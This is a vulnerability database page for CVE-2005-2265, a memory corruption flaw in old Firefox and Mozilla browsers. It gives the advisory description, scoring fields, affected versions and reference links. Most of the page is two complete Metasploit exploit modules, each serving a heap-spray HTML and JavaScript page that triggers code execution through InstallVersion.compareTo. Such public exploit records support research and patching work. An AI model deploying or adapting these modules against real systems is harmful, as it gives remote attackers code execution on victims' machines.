CVE-2005-2265 : Detail

CVE-2005-2265

94.74%V3
Network
2005-07-13
02h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Firefox before 1.0.5, Mozilla before 1.7.9, and Netscape 8.0.2 and 7.2 allows remote attackers to cause a denial of service (access violation and crash), and possibly execute arbitrary code, by calling InstallVersion.compareTo with an object instead of a string.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 16306

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: mozilla_compareto.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn # The version for this vuln is tricky because it affects mozilla 1.7-1.7.10 # and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds. autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "1.0", :ua_maxver => "1.7.10", :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }", }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution', 'Description' => %q{ This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff's HTML PoC. }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'Aviv Raff <avivra [at] gmail.com>'], 'Version' => '$Revision: 10394 $', 'References' => [ ['CVE', '2005-2265'], ['OSVDB', '17968'], ['BID', '14242'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'], ], 'Payload' => { 'Space' => 400, 'BadChars' => "\x00", }, 'Targets' => [ # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on # WinXP-SP3 and Win2kAS-SP0 [ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86, 'Ret' => 0x0c0c0c0c, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 13 2005' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch)) spray_to = sprintf("0x%.8x", target.ret) spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) ) spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) ) eax_address = sprintf("0x%.8x", target.ret) return %Q| <html> <head> <!-- Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module) From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx Greets: SkyLined, The Insider and shutdown --> <title>One second please...</title> <script language="javascript"> function BodyOnLoad() { location.href="javascript:void (new InstallVersion());"; CrashAndBurn(); }; #{js_heap_spray} // The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology function CrashAndBurn() { // Payload - Just return.. var payLoadCode=unescape("#{enc_code}"); // Size of the heap blocks var heapBlockSize=0x400000; sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38)); // Set address to fake "pdata". var eaxAddress = #{eax_address}; // This was taken from shutdown's PoC in bugzilla // struct vtbl { void (*code)(void); }; // struct data { struct vtbl *pvtbl; }; // // struct data *pdata = (struct data *)(xxAddress & ~0x01); // pdata->pvtbl->code(pdata); // (new InstallVersion).compareTo(new Number(eaxAddress >> 1)); } // --> </script> </head> <body onload="BodyOnLoad()"> </body> </html> | end end
Exploit Database EDB-ID : 9947

Publication date : 2005-07-12 22h00 +00:00
Author : H D Moore
EDB Verified : Yes

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :ua_ver => "1.0", :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }", }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution', 'Description' => %q{ This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff's HTML PoC. }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'Aviv Raff <avivra [at] gmail.com>'], 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2265'], ['OSVDB', '17968'], ['BID', '14242'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'], ], 'Payload' => { 'Space' => 400, 'BadChars' => "\x00", }, 'Targets' => [ [ 'Firefox < 1.0.5 Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86, 'StackAdjustment' => -3500, 'Addrs' => [ 0x12000000, 0x11C0002C, 0x1200002C, 0x1180002C ], } ], ], 'DisclosureDate' => 'Jul 13 2005' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch)) spray_to = sprintf("0x%.8x", target['Addrs'][0]) spray_slide1 = Rex::Text.to_unescape( [target['Addrs'][1]].pack('V'), Rex::Arch.endian(target.arch) ) spray_slide2 = Rex::Text.to_unescape( [target['Addrs'][2]].pack('V'), Rex::Arch.endian(target.arch) ) eax_address = sprintf("0x%.8x", target['Addrs'][3]) return %Q| <html> <head> <!-- Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module) From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx Greets: SkyLined, The Insider and shutdown --> <title>One second please...</title> <script language="javascript"> function BodyOnLoad() { location.href="javascript:void (new InstallVersion());"; CrashAndBurn(); }; // The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology function CrashAndBurn() { // Spray up to this address var heapSprayToAddress=#{spray_to}; // Payload - Just return.. var payLoadCode=unescape("#{enc_code}"); // Size of the heap blocks var heapBlockSize=0x400000; // Size of the payload in bytes var payLoadSize=payLoadCode.length * 2; // Caluclate spray slides size var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header // Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C var spraySlide1 = unescape("#{spray_slide1}"); spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize); var spraySlide2 = unescape("#{spray_slide2}"); //0x1200002C spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize); var spraySlide3 = unescape("#{enc_nops}"); spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize); // Spray the heap heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize; //alert(spraySlide2.length); return; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory[i]=(i\%3==0) ? spraySlide1 + payLoadCode: (i\%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode; } // Set address to fake "pdata". var eaxAddress = #{eax_address}; // This was taken from shutdown's PoC in bugzilla // struct vtbl { void (*code)(void); }; // struct data { struct vtbl *pvtbl; }; // // struct data *pdata = (struct data *)(xxAddress & ~0x01); // pdata->pvtbl->code(pdata); // (new InstallVersion).compareTo(new Number(eaxAddress >> 1)); } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide+=spraySlide; } spraySlide=spraySlide.substring(0,spraySlideSize/2); return spraySlide; } // --> </script> </head> <body onload="BodyOnLoad()"> </body> </html> | end end

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version 0.8

Mozilla>>Firefox >> Version 0.9

Mozilla>>Firefox >> Version 0.9

Mozilla>>Firefox >> Version 0.9.1

Mozilla>>Firefox >> Version 0.9.2

Mozilla>>Firefox >> Version 0.9.3

Mozilla>>Firefox >> Version 0.10

Mozilla>>Firefox >> Version 0.10.1

Mozilla>>Firefox >> Version 1.0

Mozilla>>Firefox >> Version 1.0.1

Mozilla>>Firefox >> Version 1.0.2

Mozilla>>Firefox >> Version 1.0.3

Mozilla>>Firefox >> Version 1.0.4

Mozilla>>Mozilla >> Version 1.3

Mozilla>>Mozilla >> Version 1.4

Mozilla>>Mozilla >> Version 1.4

Mozilla>>Mozilla >> Version 1.4.1

Mozilla>>Mozilla >> Version 1.5

Mozilla>>Mozilla >> Version 1.5

Mozilla>>Mozilla >> Version 1.5

Mozilla>>Mozilla >> Version 1.5

Mozilla>>Mozilla >> Version 1.5.1

Mozilla>>Mozilla >> Version 1.6

Mozilla>>Mozilla >> Version 1.6

Mozilla>>Mozilla >> Version 1.6

Mozilla>>Mozilla >> Version 1.7

Mozilla>>Mozilla >> Version 1.7

Mozilla>>Mozilla >> Version 1.7

Mozilla>>Mozilla >> Version 1.7

Mozilla>>Mozilla >> Version 1.7

Mozilla>>Mozilla >> Version 1.7

Mozilla>>Mozilla >> Version 1.7.1

Mozilla>>Mozilla >> Version 1.7.2

Mozilla>>Mozilla >> Version 1.7.3

Mozilla>>Mozilla >> Version 1.7.5

Mozilla>>Mozilla >> Version 1.7.6

Mozilla>>Mozilla >> Version 1.7.7

Mozilla>>Mozilla >> Version 1.7.8

References

http://www.debian.org/security/2005/dsa-810
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.ciac.org/ciac/bulletins/p-252.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=160202
Tags : vendor-advisory, x_refsource_FEDORA
http://secunia.com/advisories/19823
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2005-587.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/16059
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/16044
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2005/1075
Tags : vdb-entry, x_refsource_VUPEN
http://www.redhat.com/support/errata/RHSA-2005-601.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/14242
Tags : vdb-entry, x_refsource_BID
http://www.redhat.com/support/errata/RHSA-2005-586.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/16043
Tags : third-party-advisory, x_refsource_SECUNIA